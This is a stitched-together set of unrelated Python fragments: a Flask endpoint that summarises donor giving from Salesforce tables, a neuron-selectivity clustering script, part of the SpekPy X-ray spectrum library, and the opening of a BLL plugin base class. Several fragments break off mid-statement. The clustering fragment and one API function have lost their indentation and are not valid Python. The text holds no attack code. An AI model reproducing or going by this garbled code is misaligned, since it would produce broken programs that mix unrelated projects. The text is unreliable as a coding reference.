@common_api.route('/api/person/<matching_id>/support', methods=['GET'])
@jwt_ops.jwt_required()
def get_support_oview(matching_id):
    """Return these values for the specified match_id:
    largest gift, date for first donation, total giving, number of gifts,
    amount of first gift, is recurring donor

    If consuming this, check number_of_gifts first. If 0, there's no more data
    available, so don't try to read any other fields - they may not exist.
    """
    # One complication: a single match_id can map to multiple SF ids, so these queries need to
    # run on a list of contact_ids.

    # First: get the list of salesforce contact_ids associated with the matching_id
    qcids = text("select source_id FROM pdp_contacts where matching_id = :matching_id and source_type = 'salesforcecontacts';")

    oview_fields = {}  # accumulates the overview payload returned to the client

    with engine.connect() as connection:
        query_result = connection.execute(qcids, matching_id=matching_id)
        rows = [dict(row) for row in query_result]
        id_list = []
        if len(rows) > 0:
            for row in rows:
                # The ids feed IN-clause bind parameters below; only accept
                # purely alphanumeric values as a defensive filter.
                if row['source_id'].isalnum():
                    id_list.append(row['source_id'])
                else:
                    # NOTE(review): logger.warn is deprecated; prefer logger.warning.
                    current_app.logger.warn("salesforcecontacts source_id " + row['source_id'] + "has non-alphanumeric characters; will not be used")

            if len(id_list) == 0:  # No ids to query
                oview_fields['number_of_gifts'] = 0  # Marker for no support data
                return jsonify(oview_fields)

            # Aggregate stats over all of this person's donation rows.
            sov1 = text("""SELECT
                    max(amount) as largest_gift,
                    min(close_date) as first_donation_date,
                    sum(amount) as total_giving,
                    count(amount) as number_of_gifts
                FROM
                    salesforcedonations as sfd
                WHERE
                    contact_id IN :id_list ; """)
            sov1 = sov1.bindparams(id_list=tuple(id_list))
            sov1_result = connection.execute(sov1)
            row = dict(sov1_result.fetchone())
            # SQL aggregates come back NULL (-> None) when there are no
            # donation rows; map those to 0.0 / '' defaults.
            if row['largest_gift']:
                oview_fields['largest_gift'] = float(row['largest_gift'])
            else:
                oview_fields['largest_gift'] = 0.0
            if row['first_donation_date']:
                oview_fields['first_donation_date'] = str(row['first_donation_date'])
            else:
                oview_fields['first_donation_date'] = ''
            if row['total_giving']:
                oview_fields['total_giving'] = float(row['total_giving'])
            else:
                oview_fields['total_giving'] = 0.0
            oview_fields['number_of_gifts'] = row['number_of_gifts']

            # These could be combined into a single complex query.
            # Amount of the earliest (first) gift.
            sov2 = text("""SELECT
                    amount as first_gift_amount
                FROM
                    salesforcedonations as sfd
                WHERE
                    contact_id IN :id_list
                ORDER BY close_date asc
                limit 1 ; """)
            sov2 = sov2.bindparams(id_list=tuple(id_list))
            sov2_result = connection.execute(sov2)
            if sov2_result.rowcount:
                fga = sov2_result.fetchone()[0]
                if fga:
                    oview_fields['first_gift_amount'] = float(fga)
                else:
                    oview_fields['first_gift_amount'] = 0.0
            else:
                oview_fields['first_gift_amount'] = 0.0

            # Recurring-donor flag, taken from the most recent donation row.
            sov3 = text("""SELECT
                    recurring_donor as is_recurring
                FROM
                    salesforcedonations as sfd
                WHERE
                    contact_id IN :id_list
                ORDER BY close_date DESC
                LIMIT 1; """)
            sov3 = sov3.bindparams(id_list=tuple(id_list))
            sov3_result = connection.execute(sov3)
            if sov3_result.rowcount:
                oview_fields['is_recurring'] = sov3_result.fetchone()[0]
            else:
                oview_fields['is_recurring'] = False

            # RFM score plus its display attributes, if an analysis run has
            # scored this matching_id; empty strings otherwise.
            rfm = text("""SELECT
                    rfm_score, rfm_color, rfm_label, rfm_text_color
                FROM
                    rfm_scores
                    left join rfm_mapping on rfm_mapping.rfm_value = rfm_score
                WHERE
                    matching_id = :match_id; """)
            rfm = rfm.bindparams(match_id=matching_id)
            rfm_result = connection.execute(rfm)
            if rfm_result.rowcount:
                row = rfm_result.fetchone()
                oview_fields['rfm_score'] = row[0]
                oview_fields['rfm_color'] = row[1]
                oview_fields['rfm_label'] = row[2]
                oview_fields['rfm_text_color'] = row[3]
            else:
                oview_fields['rfm_score'] = ''
                oview_fields['rfm_color'] = ''
                oview_fields['rfm_label'] = ''
                oview_fields['rfm_text_color'] = ''

            return jsonify(oview_fields)

        else:  # len(rows) == 0
            current_app.logger.debug('No SF contact IDs found for matching_id ' + str(matching_id))
            oview_fields['number_of_gifts'] = 0  # Marker for no data
            return jsonify(oview_fields)
@common_api.route('/api/last_analysis', methods=['GET'])
@jwt_ops.jwt_required()
def get_last_analysis():
""" Return the UTC string (e.g., '2021-12-11T02:29:14.830371') representing
when the last analysis run succesfully completed.
Returns an empty string if no results.
"""
last_run = ''
last_stamp = """
select update_stamp
from execution_status
where stage = 'flow' and status = 'complete'
order by update_stamp desc
limit 1;
"""
with engine.connect() | |
0:
print("ERROR: we have an empty cluster list for {}?".format(current_neuron_index))
continue
if current_best_K == 1:
# uniform distrubtion or a higher value of k needed!
print('Neuron {} has a K of 1, may require further investigation!'.format(current_neuron_index))
jitterer(x_data=cluster_list, colour_flag='cluster', title='Yo',
save_label=name_leader + str(current_neuron_index) + '_kmeans' + '.png', show_plots=False,
save_plots=True,
do_x_axis=True, do_y_axis=False, x_range=None, y_range=None, label_dict=label_dict,
outLayerNeuron=False,
current_neuron_index=current_neuron_index)
fs_plotter(fs=cloud.fs, layer_name='prob_', current_neuron_index=current_neuron_index)
gap_list, max_gap, max_gap_code, max_2_gap, max_2_gap_code \
= [], 0, 'Null', 0, 'Null'
else:
gap_list, max_gap, max_gap_code, max_2_gap, max_2_gap_code \
= find_gaps_between_clusters(cluster_list, dict_keys=[], invert=True)
if len(cluster_list[current_best_K - 1]) == 1:
# we found a grandma cell for one picture
no_of_single_grandma = no_of_single_grandma + 1
# we define the structural range as anything above the biggest gap
if max_gap_code == 1:
# we've found a grandmother cell alike!
no_of_weak_grandmas = no_of_weak_grandmas + 1
print('{} weak grandmas'.format(no_of_weak_grandmas))
No_classes_struct = len(unique_classes_0)
no_of_top_class_in_struct = sum([1 for x in local_list if x[0] == top_class])
struct_no = c_0_no
struct_K = 1
else:
# we got a structured layer at the top
# lets do another k-means
struct_K = max_gap_code
# middle of the gap between structured and unstructured
if not current_best_K == 1:
mid_struct_gap = max(cluster_list[current_best_K - max_gap_code - 1]) \
+ 0.5 * (min(cluster_list[current_best_K - max_gap_code]) - max(
cluster_list[current_best_K - max_gap_code - 1]))
total_range = cloud.maxX - cloud.minX
as_pc = mid_struct_gap / total_range
# numx = len(current_neuron.vector[current_neuron.vector > 0.5 * rangemax])
try:
structured = FastDetK(X=current_neuron, discard=as_pc)
except UserWarning as e:
print('That weird error where it spits on struct region and fails to find any points, sob :(')
continue
max_possible_K = len(set(structured.X)) # to catch when there are repeated values
chosen_max_K = min(max_K_For_Structured, max_possible_K)
structured.runFK(chosen_max_K)
else:
print('Trying a further k-means on Neuron {}, discarding 75% of data'.format(current_neuron_index))
try:
structured = FastDetK(X=current_neuron, discard=75)
except UserWarning as e:
print('That weird error where it spits on struct region and fails to find any points, sob :(')
continue
max_possible_K = len(set(structured.X)) # to catch when there are repeated values
chosen_max_K = min(max_K_For_Structured, max_possible_K)
structured.runFK(chosen_max_K)
print('Updated K of {} for neuron {}'.format(structured.K, current_neuron_index))
gap_list, max_gap, max_gap_code, max_2_gap, max_2_gap_code \
= find_gaps_between_clusters(cluster_list, dict_keys=[], invert=True)
if do_pictures or current_neuron_index in range_for_pictures:
fs_plotter(fs=structured.fs, layer_name='prob_struct_', current_neuron_index=current_neuron_index)
if (structured.K == max_possible_K) and (not max_possible_K == 1):
if (structured.fs[0:max_possible_K - 1] < allowed_error).any():
# one of the smaller numbers of K gives us clusters to within our accuracy
# RE RUN K MEANS!
print('K found that is within error range but not optimal')
structured.runFK(max_possible_K - 1)
updated_cluster_list = {}
print('K of structured layer is {}'.format(structured.K))
K_below_struct = current_best_K - max_gap_code
for old_key in cluster_list.keys():
if old_key < K_below_struct:
updated_cluster_list[old_key] = cluster_list[old_key]
for new_key in structured.clusters.keys():
updated_cluster_list[new_key + K_below_struct] = structured.clusters[new_key]
if do_pictures or current_neuron_index in range_for_pictures:
jitterer(x_data=updated_cluster_list, colour_flag='cluster', title='Yo',
save_label=name_leader + str(current_neuron_index) + '_heir_kmeans' + '.png',
show_plots=False,
save_plots=True,
do_x_axis=True, do_y_axis=False, x_range=None, y_range=None, label_dict=label_dict,
outLayerNeuron=False,
current_neuron_index=current_neuron_index)
local_list_struct, selected_activations_struct = grab_points_for_a_cluster(current_neuron_index,
min_selected_x_data=min(
structured.X),
max_selected_x_data=max_top_cluster,
acts=acts,
x_data=x_data,
verbose=verbose)
unique_classes_struct = set([x[0] for x in local_list_struct])
No_classes_struct = len(unique_classes_struct)
no_of_top_class_in_struct = sum([1 for x in local_list_struct if x[0] == top_class])
struct_no = structured.N
struct_K = structured.K
# TODO these stats should be a function, here you're doing the same thing 3 times
# did not have time ot write it properly so please fix
# To do!
# now we do whole (half!) range
local_list_half, selected_activations_half = grab_points_for_a_cluster(current_neuron_index,
min_selected_x_data=cloud.midX,
max_selected_x_data=max_top_cluster,
acts=acts,
x_data=x_data,
verbose=verbose)
# c_0_no = len(local_list)
# top_class = local_list[0][0]
unique_classes_half = set([x[0] for x in local_list_half])
No_classes_in = len(unique_classes_half)
no_of_top_class_in_all = sum([1 for x in local_list_half if x[0] == top_class])
extent_of_top_class = find_extent_of_top_class(local_list=local_list_half)
if looking_at_output_layer:
local_list, selected_activations = grab_points_for_a_cluster(current_neuron_index,
min_selected_x_data=0,
max_selected_x_data=max_top_cluster,
acts=acts,
x_data=x_data,
verbose=verbose)
extent_of_top_class = find_extent_of_top_class(local_list=local_list)
local_list = local_list_half[-101:-1]
selected_activations = selected_activations_half[-101:-1]
no_of_top_class_in_top_100 = sum([1 for x in local_list if x[0] == top_class])
no_of_top_class = no_files_in_label[top_class]
if do_ccma_selectivity == True:
# this should be bunged up top as well, but for now...
# irritiatingly to compute class conditional selectivity, we need to cluster by classes sigh
class_cluster_list, min_list, max_list = build_cluster_from_class_label(acts=acts,
current_neuron_index=current_neuron_index,
label_dict=label_dict,
current_neuron=current_neuron,
found_labels=found_labels,
do_check=do_check)
# this computes the CCMAS for the highest mean activating class
ccma_selectivity, mu_max, mu_not_max, max_index = \
compute_ccma_selectivity_neuron(class_cluster_list, found_labels='', class_dict=class_dict,
class_labels=class_labels, top_class='', verbose=verbose)
[top_mean_class, top_mean_code, top_mean_label] = class_lineno_to_name(line_no=max_index,
class_labels=class_labels)
if not top_mean_code == top_class:
print('Class with top activations is not the class with the highest mean activation')
print('Top class: {}; top mean class: {}'.format(top_class_name, top_mean_class))
# the class with the highest activation values is not the same as the class with the highest mean activation value!
# so d oteh computation for the top-most class
ccma_selectivity_top, mu_max_top, mu_not_max_top, max_index_top = \
compute_ccma_selectivity_neuron(class_cluster_list, found_labels='', class_dict=class_dict,
class_labels=class_labels, top_class=top_class, verbose=verbose)
if do_true_picture:
# do it anyway
egg = class_code_to_name(class_name=top_mean_class, class_dict=class_dict,
class_labels=class_labels)
# actual_class = found_labels.index(class_labels[current_neuron_index].split(' ')[0])
print('maximally activated class is {}'.format(top_class_name))
if do_pictures:
jitterer(x_data=class_cluster_list, colour_flag='cluster', title='Yo',
save_label=name_leader + 'class_' + str(current_neuron_index) + 'cbycMEAN.png',
show_plots=False,
save_plots=True,
do_x_axis=True, do_y_axis=False, x_range=None, y_range=None,
label_dict=label_dict,
outLayerNeuron=True,
current_neuron_index=max_index)
else:
ccma_selectivity_top, mu_max_top, mu_not_max_top, max_index_top = ccma_selectivity, mu_max, mu_not_max, max_index
# sigh, now lets check out the second most mean activating class...
if do_second_Botvinick:
# compare the selectivity of the second most mean activating class
not_class_cluster_list = [class_cluster_list[i] for i in range(len(class_cluster_list)) if
not i == max_index]
ccma_selectivity_2, mu_max_2, mu_not_max_2, max_index_2 = \
compute_ccma_selectivity_neuron(not_class_cluster_list, found_labels='', class_dict=class_dict,
class_labels=class_labels, top_class='', verbose=verbose)
[top_2_mean_class, _, _] = class_lineno_to_name(line_no=max_index_2, class_labels=class_labels)
else:
ccma_selectivity_2, mu_max_2, mu_not_max_2, max_index_2 = 0.0, 0.0, 0.0, max_index
top_2_mean_class = ''
# do ranges
range_top = max(class_cluster_list[max_index_top]) - min(class_cluster_list[max_index_top])
range_mean = max(class_cluster_list[max_index]) - min(class_cluster_list[max_index])
range_2_mean = max(class_cluster_list[max_index_2]) - min(class_cluster_list[max_index_2])
isClassSelective, selectivity, found_class = compute_selectivity_neuron(max_list, min_list,
found_labels, verbose=False)
# if the region above the struct were taken as a code, what would the selectivity be?
gap_selectivity = max_gap / max_activation
if isClassSelective:
# and if it is selective with all points, plot the graph
#foundSelectivityList.append(selectivity)
#foundClassList.append(found_class)
#foundNeuronList.append(current_neuron_index)
if looking_at_output_layer == True:
# as cluster_list is build from label_dict, and label_dict is in a shuffled order
# we must find out which class we are really on!
actual_class = found_labels.index(class_labels[current_neuron_index].split(' ')[0])
print('actual class {}'.format(actual_class))
if do_pictures:
jitterer(x_data=cluster_list, colour_flag='cluster', title='Yo',
save_label=name_leader + str(current_neuron_index) + '.png', show_plots=False,
save_plots=True,
do_x_axis=True, do_y_axis=False, x_range=None, y_range=None, label_dict=label_dict,
outLayerNeuron=True,
current_neuron_index=actual_class)
else:
if do_pictures or current_neuron_index in range_for_pictures:
# name_leader = 'fc6_layer_neuron'
jitterer(x_data=cluster_list, colour_flag='cluster', title='Yo',
save_label=name_leader + str(current_neuron_index) + '.png', show_plots=False,
save_plots=True,
do_x_axis=True, do_y_axis=False, x_range=None, y_range=None, label_dict=label_dict,
outLayerNeuron=False,
current_neuron_index=0)
row = {'Neuron no.': str(current_neuron_index), # neuron index
'top_class_name': str(top_class_name),
'all_K': str(cloud.K), # no of K for 'All': whole of (midX to maxX) range
'all_No_images': str(cloud.N), # No of images over All
'biggest_gap': str(max_gap), # Size of biggest gap: this defines the start of 'Struct' range
'big_gap_code': str(max_gap_code), # Coded position of gap: 0 is top cluster, counting down
'second_biggest_gap': str(max_2_gap), # Second biggest gap size --> could be used as struct start
'2_Big_gap_code': str(max_2_gap_code), # Gap position code
'top_class': str(top_class), # Class with highest activation- could be a list
'c_0_no': str(c_0_no), # No. images in cluster 0 (top cluster)
'c_0_no_class': str(c_0_no_classes), # No. of classes in top cluster
'struct_no': str(struct_no), # No. of images in structured region
'struct_K': str(struct_K), # No. of clusters in struct range --> this may be after a 2nd kmeans
'struct_no_class': str(No_classes_struct), # No of classes in structured region
'No_top_in_cluster_0': str(c_0_no_classes), # No. of top class in top cluster
'No_top_class_in_struct': str(no_of_top_class_in_struct), # No. of top class in structure
'No_top_class_in_half_range': str(no_of_top_class_in_all), # No. of top class in half range
'No_top_class': str(no_of_top_class), # No in the top class overall
'pc_top_class_in_top_100': str(no_of_top_class_in_top_100), # pc of top class in top 100
'is_class_selective': isClassSelective,
'ccma_selectivity_top': str(ccma_selectivity_top), # ccma_selectivity to top activating class
'mu_max_top': str(mu_max_top), # average activation of top activating class
'ccma_selectivity': str(ccma_selectivity), # ccma_selectivity of highest mean activation class
'mu_max': str(mu_max), # mean of highest mean activatinging class
'mean_act_class_name': str(top_mean_class), # name of highest mean class
'ccma_selectivity_2': str(ccma_selectivity_2),
# ccma_selectivity of 2nd highest mean activation class
'mu_max_2': str(mu_max_2), # mean of second highest mean activatinging class
'mean_act_class_name_2': str(top_2_mean_class), # name of highest mean class
'range_top': str(range_top), # range of | |
<filename>spekpy/SpekPy.py
# For compatibility with Python2 #
from __future__ import print_function, division, absolute_import
##################################
from . import __version__
import spekpy.SpekConstants as Const
from spekpy.IO import find_file, path_file, read_spectrum_from_disk, \
get_script_path, is_file, print_matl_info, print_matls_in_group, \
print_states, print_matls, delete_file
from spekpy.SpekState import State, FiltrationDef
from spekpy.SpekModel import SpekModel
import copy
from spekpy.SpekTools import load_mu_data, change_filtration, \
calculate_air_kerma_from_spectrum, calculate_mean_energy_from_spectrum, \
calculate_effective_energy_from_spectrum, calculate_fluence_from_spectrum,\
calculate_required_filter_thickness, \
calculate_first_half_value_layer_from_spectrum, \
calculate_second_half_value_layer_from_spectrum, \
calculate_output_arrays, \
calculate_homogeneity_coefficient_from_spectrum, \
StandardResults, generate_spectrum, make_composition_def
from spekpy.DataTables import data
from numpy import isclose
from scipy.ndimage import gaussian_filter
class Spek:
def __init__(self,
kvp=None, th=None, dk=None, mu_data_source=None, physics=None,
x=None, y=None, z=None, mas=None, brem=None, char=None, obli=None,
comment=None, targ=None, shift=None, init_default=True):
self._rg, self._pe, self._ne, self._line_data, self._nist_brem_data \
= data
self.state = State()
self.state.spekpy_version = __version__
self.state.script_path = get_script_path()
self.mu_data = None
self.muen_air_data = None
self.model=SpekModel()
if init_default:
# Assign defaults if not specified
th = 12.0 if th is None else th
dk = 0.5 if dk is None else dk
targ = 'W' if targ is None else targ
if kvp is None:
kvp = 100.0 if targ == 'W' else 30.0
x = 0.0 if x is None else x
y = 0.0 if y is None else y
z = 100.0 if z is None else z
mas = 1.0 if mas is None else mas
brem = True if brem is None else brem
char = True if char is None else char
obli = True if obli is None else obli
comment = None if comment is None else comment
physics = Spek.alias('casim') if physics is None \
else Spek.alias(physics.lower())
if mu_data_source is None:
if physics == 'spekcalc' or physics == 'spekpy-v1':
mu_data_source = 'nist'
else:
mu_data_source = 'pene'
# Check validity of inputs
if physics == 'spekcalc' or physics == 'spekpy-v1':
if targ != 'W':
raise Exception("Only tungsten anode available for "
"selected physics mode (targ = 'W')")
if targ not in ['W', 'Mo', 'Rh']:
raise Exception("Requested anode material is not available "
"(targ = 'W', 'Mo' or 'Rh')")
if mu_data_source != 'nist' and mu_data_source != 'pene':
raise Exception("Requested mu_data_source is unrecognized "
"(mu_data_source = 'nist' or 'pene')")
if physics == 'spekcalc' or physics == 'spekpy-v1':
if kvp<10. or kvp>1000.:
raise Exception("Requested kVp is out of range for "
"selected physics model "
"(kvp = 10 to 1000 kV)")
else:
if targ == 'W':
if kvp<20. or kvp>300.:
raise Exception("Requested kVp is out of range for "
"selected physics model and target"
"(kvp = 30 to 300 kV)")
else:
if kvp<20. or kvp>50.:
raise Exception("Requested kVp is out of range for "
"selected physics model and target"
"(kvp = 20 to 50 kV)")
if shift is not None:
if shift > 0.5 or shift < -0.5:
raise Exception("Requested bin shift is outside allowed "
"range (shift = -0.5 to +0.5)")
# Assign parameters to state
self.set_state_parameters(kvp=kvp, th=th, dk=dk, physics=physics,
mu_data_source=mu_data_source, x=x, y=y, z=z, mas=mas,
brem=brem, char=char, obli=obli, targ=targ, shift=shift)
@staticmethod
def alias(name):
"""
A static method to map user physics modes strings to the strings used
internally in the software
:param str name: The name of the physics mode
:return str alias_name: The name used internally for the physics mode
"""
aliases = {'legacy':'spekcalc','default':'spekpy-v1',
'kqp':'spekpy-v2-kqp','sim':'spekpy-v2-sim','uni':'spekpy-v2-uni',
'casim':'spekpy-v2-casim','diff':'spekpy-v2-diff'}
aliases_list = list(aliases.keys())
for alias_name in aliases_list:
aliases[aliases[alias_name]] = aliases[alias_name]
alias_name = aliases[name]
return alias_name
    def set_state_parameters(self, **kwargs):
        """
        Set arbitrary attributes in the spekpy state (internal method).

        Keywords are routed to whichever sub-state owns them (external
        spectrum, model parameters, or spectrum parameters). If a model
        parameter changes, the spectrum model is re-initialized and the
        existing filtration is re-applied; for the 'kqp' and 'sim' physics
        modes a change in take-off angle (x/z or y/z) also forces a model
        re-initialization. Finally, any 'ref_kerma'/'ref_flu' keyword
        updates the normalization factor.

        :param kwargs: Keyword arguments that are supported by the spekpy
            state
        :return: self
        :raises Exception: for unrecognized keywords, or if both ref_kerma
            and ref_flu are given
        """
        if 'physics' in kwargs.keys():
            kwargs['physics'] = self.alias(kwargs['physics'])
        # Snapshot of the state before the update, used below to detect a
        # change in take-off angles
        initial_state = copy.deepcopy(self.state)
        if kwargs:
            model_parameters_changed = False
            update_model = False
            update_external = False
            # Loop through the keywords, validate if they exist in the spekpy
            # ... state and update if model parameters have changed
            for keyword in kwargs:
                if hasattr(self.state.external_spectrum, keyword):
                    setattr(self.state.external_spectrum, keyword,
                            kwargs[keyword])
                elif hasattr(self.state.model_parameters, keyword):
                    # Only update if the model parameters really have changed.
                    # NOTE(review): 'is not' compares object identity, so a
                    # numerically equal float passed afresh still counts as
                    # "changed" and triggers a re-initialization; harmless
                    # but potentially wasteful -- confirm intended.
                    if getattr(self.state.model_parameters, keyword) is \
                            not kwargs[keyword]:
                        setattr(self.state.model_parameters, keyword,
                                kwargs[keyword])
                        model_parameters_changed = True
                elif hasattr(self.state.spectrum_parameters, keyword):
                    setattr(self.state.spectrum_parameters, keyword,
                            kwargs[keyword])
                else:
                    raise Exception("Keyword argument " + keyword +
                                    " not recognized!")
            # A model-parameter change re-derives either the modelled
            # spectrum or (for file-based spectra) just the mu data
            if self.state.external_spectrum.external_spectrum is None:
                if model_parameters_changed:
                    update_model = True
            else:
                if model_parameters_changed:
                    update_external = True
            # For the two physics models below, the state needs updating if
            # ... the take-off angles changes
            if self.state.model_parameters.physics=='spekpy-v2-kqp' or \
                self.state.model_parameters.physics=='spekpy-v2-sim':
                x=self.state.spectrum_parameters.x
                y=self.state.spectrum_parameters.y
                z=self.state.spectrum_parameters.z
                x_init=initial_state.spectrum_parameters.x
                y_init=initial_state.spectrum_parameters.y
                z_init=initial_state.spectrum_parameters.z
                # NOTE(review): assumes z is non-zero here; z == 0 would
                # raise ZeroDivisionError -- confirm callers guarantee this.
                if z_init is not None:
                    if not isclose(x_init/z_init,x/z,atol=1e-5) or \
                        not isclose(y_init/z_init,y/z,atol=1e-5):
                        update_model = True
            if update_model:
                # Re-initialize the model parameters
                self.mu_data, self.muen_air_data = load_mu_data(
                    self.state.model_parameters.mu_data_source)
                self.spectrum_from_model()
                # Re-apply the filtration that existed before the rebuild
                current_filtration = self.state.filtration.filters
                self.state.filtration = FiltrationDef()
                self.multi_filter(current_filtration)
            if update_external:
                self.mu_data, self.muen_air_data = load_mu_data(
                    self.state.model_parameters.mu_data_source)
            # Manage normalization by reference air kerma of fluence
            if 'ref_kerma' in kwargs or 'ref_flu' in kwargs:
                if 'ref_kerma' in kwargs and 'ref_flu' in kwargs:
                    # NOTE(review): this message concatenates to
                    # "...referencefluence..." (missing space)
                    raise Exception("A reference air kerma and reference"
                                    "fluence cannot both be specified!")
                elif 'ref_kerma' in kwargs:
                    self.state.spectrum_parameters.ref_flu = None
                    # Scale factor so that get_kerma() equals ref_kerma
                    kerma = self.get_kerma(ref_kerma=None)
                    self.model.norm = \
                        self.state.spectrum_parameters.ref_kerma / kerma
                elif 'ref_flu' in kwargs:
                    self.state.spectrum_parameters.ref_kerma = None
                    # Scale factor so that get_flu() equals ref_flu
                    flu = self.get_flu(ref_flu=None)
                    self.model.norm = \
                        self.state.spectrum_parameters.ref_flu / flu
            else:
                # No reference given: clear any previous normalization
                self.model.norm = None
                self.state.spectrum_parameters.ref_kerma = None
                self.state.spectrum_parameters.ref_flu = None
        return self
def parameters_for_calculation(self, **kwargs):
"""
A function to handle parameters in spekpy calculations without setting
the state of spekpy (transient)
This function recognized the following keyword arguments:
x, y, z, brem, char, obli
:param kwargs: A set of keyword arguments for parameters that can
temporarly be used for calculations
"""
calc_params = copy.deepcopy(self.state.spectrum_parameters)
for keyword in kwargs:
if hasattr(calc_params, keyword):
setattr(calc_params, keyword, kwargs[keyword])
else:
raise Exception('Keyword argument '+ keyword +' not recognized')
if getattr(calc_params, 'ref_kerma') is not None and \
getattr(calc_params, 'ref_flu') is not None:
raise Exception("A reference air Kerma and reference fluence "
"cannot both be specified!")
if 'x' in kwargs or 'y' in kwargs or 'z' in kwargs:
if self.state.model_parameters.physics == Spek.alias('kqp') or \
self.state.model_parameters.physics == Spek.alias('sim'):
x=self.state.spectrum_parameters.x
y=self.state.spectrum_parameters.y
z=self.state.spectrum_parameters.z
x_calc=calc_params.x
y_calc=calc_params.y
z_calc=calc_params.z
if not isclose(x_calc/z_calc,x/z,atol=1e-5) or \
not isclose(y_calc/z_calc,y/z,atol=1e-5):
raise Exception('Cannot update spatial position.\n' +
'Specified value of "physics" keyword prohibits a ' +
'change in take-off angles on-the-fly.\n' +
'Try using the "set()" method to change x, y or z.')
return calc_params
def spectrum_from_model(self):
"""
Internal method to get spectra from spekpy's model of photon emission
:return:
"""
self.model = SpekModel().get_spectrum_parameters(self)
    def spectrum_from_external_source(self,z,mas):
        """
        Internal method used in loading an external spectrum from a file.

        The fluence arrays read from disk are rescaled from the file's
        geometry/exposure to photons per steradian per incident electron,
        and the energy grid parameters of the state are updated to match.

        :param float z: The focus-to-detector distance for the file spectrum
        :param float mas: The exposure (tube current-time product) for the
            file spectrum
        :return:
        """
        k, brem, char, dk = read_spectrum_from_disk(self)
        # Number of electrons corresponding to the given mAs
        number_of_incident_electrons = mas * Const.conversion_A2mA \
            / Const.electron_charge
        # Convert external fluence spectrum to photons per solid angle per
        # ... incident electron
        self.model.brem_k = brem * z**2 / number_of_incident_electrons
        self.model.char_k = char * z**2 / number_of_incident_electrons
        self.model.k = k
        self.state.model_parameters.dk = dk
        # The highest bin centre plus half a bin width defines the kVp
        self.state.model_parameters.kvp = max(k) + 0.5*dk
def set(self, **kwargs):
"""
A method to set parameters in the spekpy state
:param kwargs: A variable number of keyword arguments to change the
state of spekpy
:return:
"""
self.set_state_parameters(**kwargs)
return self
def summarize(self, mode='minimal'):
"""
A method to print a summary of the current state and results thereof to
the console
:param str mode: The mode of summarization. Either 'full' or 'minimal'
(default)
:return:
"""
if mode == 'full':
self.state.tmp_results = self.get_std_results()
summarization = self.state.get_current_state_str(mode)
elif mode == 'minimal':
summarization = self.state.get_current_state_str(mode)
else:
raise Exception("The mode must be either full or minimal "
"(default)")
print(summarization)
    def filter(self, matl, t):
        """
        A method to alter the spectral filtration.

        Delegates to SpekTools.change_filtration, which updates both the
        filtration record in the state and the filtered spectrum arrays.
        (The name intentionally shadows the builtin ``filter``; it is part
        of the public spekpy API.)

        Example usage:
        spk.filter('Al', 1)

        :param str matl: The name of the desired filter material
        :param float t: The thickness of the desired filtration [mm]
        :return:
        """
        change_filtration(self, matl, t)
| |
# (c) Copyright 2015-2016 Hewlett Packard Enterprise Development LP
# (c) Copyright 2017 SUSE LLC
import logging
import inspect
import pykka
import copy
import time
import traceback
from bll.common import util
from bll.common.exception import InvalidBllRequestException, BllException
from bll.api.auth_token import TokenHelpers
from bll.api.response import BllResponse
from bll.api.request import BllRequest
from bll import api
from bll.common.job_status import get_job_status, update_job_status
from bll.common import i18n
from bll.common.util import context, new_txn_id
from stevedore import driver
from requests.exceptions import HTTPError
LOG = logging.getLogger(__name__)
def expose(operation=None, action='GET', is_long=False):
    """ A decorator for exposing methods as BLL operations/actions.

    Keyword arguments:

    * operation
        the operation name the caller supplies in the BLL request; when
        omitted, the decorated method's own name is used.

    * action
        the action (typically ``GET``, ``PUT``, ``DELETE`` or ``POST``)
        matched against the BLL request; when falsy, dispatching ignores
        the action.

    * is_long
        marks the method as long-running. Long-running methods are called
        either once (via complete) or twice (via handle for validation and
        via complete for the rest): if the method takes an argument besides
        self it is called twice, the argument indicating whether it is the
        handle-time call, and the validation call should return a
        recommended polling interval.

    Note, if you override handle or complete, this decoration is ignored!

    A short-running method simply returns the data portion of the response
    (handle wraps it in a full BllResponse) and raises an exception on
    failure (handle packages it up). Applying the decorator multiple times
    exposes one method under several operations, e.g.::

        class MySvc(SvcBase)
            @expose('add_stuff')
            @expose('update_stuff')
            def add_or_update(self):
                ...
    """
    def decorate(func):
        func.exposed = True
        # Accumulate operations so repeated decoration stacks up
        if not hasattr(func, 'operation'):
            func.operation = []
        func.operation.append(operation or func.__name__)
        if action:
            func.action = action
        if is_long:
            func.is_long = is_long
        # Register attributes on the original function and return it
        # unmodified (no wrapper is created)
        return func
    return decorate
class SvcBase(pykka.ThreadingActor):
"""
Base class for plugins.
"""
    def __init__(self, bll_request=None):
        """
        Validate the incoming BllRequest and unpack its common fields into
        attributes (request, response, token, action, region, data, ...).

        :param bll_request: the BllRequest to service
        :raises InvalidBllRequestException: if bll_request is not a
            BllRequest instance
        """
        super(SvcBase, self).__init__()
        # Extract common fields into attributes
        if not isinstance(bll_request, BllRequest):
            raise InvalidBllRequestException('Invalid request class')
        self.request = bll_request
        self.response = BllResponse(self.request)
        # NOTE(review): token_helper/token are only bound when the request
        # carries an auth token; code reading them on token-less requests
        # would hit AttributeError -- confirm all callers guarantee a token.
        if api.AUTH_TOKEN in self.request:
            self.token_helper = TokenHelpers(self.request.get(api.AUTH_TOKEN))
            self.token = self.request.get(api.AUTH_TOKEN)
        request_data = self.request.get(api.DATA, {})
        self.action = self.request.get(api.ACTION)
        self.api_version = None
        self.operation = None
        self.data = {}
        self.txn_id = self.request.txn_id
        self.region = self.request.get(api.REGION)
        # Assign _ as a member variable in this plugin class for localizing
        # messages
        self._ = i18n.get_(self.request.get(api.LANGUAGE, 'en'))
        # Extract request data, filtering out known keys
        # (iteritems: this module is Python 2)
        for k, v in request_data.iteritems():
            if k == api.OPERATION:
                self.operation = v
            elif k == 'suggest_sync':
                # Omit the obsolete, poorly-supported suggest_sync flag
                pass
            elif k == api.VERSION:
                self.api_version = v
            else:
                # Everything else is payload for the plugin method
                self.data[k] = v
    @staticmethod
    def spawn_service(bll_request):
        """
        Call the targeted service, using stevedore to load the plugin whose
        name matches the 'target' field of the incoming request.

        Starts the plugin as a pykka actor, runs the short-running phase
        (sc_handle) synchronously, then kicks off the long-running phase
        (sc_complete) and returns the handle-phase result. On any failure
        the actor is stopped and an error BllResponse is returned instead
        of raising.

        :param bll_request: the BllRequest naming the target plugin
        :return: the sc_handle result, or an error BllResponse on failure
        """
        srv = None
        # Assign _ in this function for localizing messages
        _ = i18n.get_(bll_request.get(api.LANGUAGE, 'en'))
        try:
            mgr = driver.DriverManager(
                namespace='bll.plugins',
                name=bll_request.get(api.TARGET))
            # Start the plugin actor and talk to it through a proxy
